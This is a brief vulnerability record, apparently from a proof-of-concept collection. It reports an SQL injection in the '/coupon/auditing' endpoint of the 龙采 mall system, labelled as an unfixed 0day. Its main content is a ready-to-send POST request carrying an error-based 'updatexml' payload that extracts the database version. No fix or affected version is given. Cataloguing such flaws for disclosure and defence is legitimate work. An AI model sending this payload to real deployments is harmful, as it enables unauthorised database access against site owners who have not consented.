vendor = "龙采"
name = "龙采商城系统 auditing 接口存在SQL注入"
type = "SQL注入"
version = "未知"
path = "/coupon/auditing"
detail = "POST /coupon/auditing HTTP/1.1 id=1%20and%20updatexml(1,concat(0x7e,@@version,0x7e),1)"
fix = "未知"
date = "0714"
label = "0day"
verifier = "AdySec"
